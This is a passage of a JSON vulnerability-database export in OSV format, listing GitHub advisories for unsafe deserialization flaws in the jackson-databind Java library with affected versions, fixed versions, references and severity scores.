"2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-85cw-hj65-qqv9/GHSA-85cw-hj65-qqv9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16335" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2449" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191004-0002" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0fcef7321095ce0bc597d468d150cff3d647f4cb3aef3bd4d20e1c69@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/40c00861b53bb611dee7d6f35f864aa7d1c1bd77df28db597cbf27e1@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a360b46061c91c5cad789b6c3190aef9b9f223a2b75c9c9f046fe016@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ad0d238e97a7da5eca47a014f0f7e81f440ed6bf74a93183825e18b9@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dc6b5cad721a4f6b3b62ed1163894941140d9d5656140fb757505ca0@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e90c3feb21702e68a8c08afce37045adb3870f2bf8223fa403fb93fb@%3Ccommits.hbase.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-09-19T09:22:56Z", "nvd_published_at": "2019-09-15T22:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-89qr-369f-5m5x", "published": "2021-12-09T19:15:46Z", "modified": "2024-02-18T05:37:27.581808Z", "aliases": [ "CVE-2020-36182" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-89qr-369f-5m5x/GHSA-89qr-369f-5m5x.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-89qr-369f-5m5x/GHSA-89qr-369f-5m5x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36182" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:37:58Z", "nvd_published_at": "2021-01-07T00:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8c4j-34r4-xr8g", "published": "2021-12-09T19:16:18Z", "modified": "2024-02-18T05:31:52.762759Z", "aliases": [ "CVE-2020-36180" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-8c4j-34r4-xr8g/GHSA-8c4j-34r4-xr8g.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-8c4j-34r4-xr8g/GHSA-8c4j-34r4-xr8g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36180" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:36:46Z", "nvd_published_at": "2021-01-07T00:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8w26-6f25-cm9x", "published": "2021-12-09T19:16:02Z", "modified": "2024-02-18T05:30:48.085017Z", "aliases": [ "CVE-2020-36185" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-8w26-6f25-cm9x/GHSA-8w26-6f25-cm9x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36185" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2998" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/567194c53ae91f0a14dc27239afb739b1c10448a" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:37:42Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-95cm-88f5-f2c7", "published": "2020-04-23T16:32:59Z", "modified": "2024-07-03T21:23:01.986952Z", "aliases": [ "CVE-2020-10672" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-95cm-88f5-f2c7/GHSA-95cm-88f5-f2c7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10672" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2659" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html" }, { "type": "WEB", "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T21:12:55Z", "nvd_published_at": "2020-03-18T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9gph-22xh-8x98", "published": "2021-12-09T19:15:54Z", "modified": "2024-02-18T05:33:27.617261Z", "aliases": [ "CVE-2020-36179" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-9gph-22xh-8x98/GHSA-9gph-22xh-8x98.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-9gph-22xh-8x98/GHSA-9gph-22xh-8x98.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36179" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc255f41d9a61d3dc79a51fb5c713de4ae10e71e3673feeb0b180b436@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:37:47Z", "nvd_published_at": "2021-01-07T00:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9m6f-7xcq-8vf8", "published": "2021-12-09T19:16:34Z", "modified": "2024-02-18T05:32:25.400029Z", "aliases": [ "CVE-2020-36183" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.00" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", 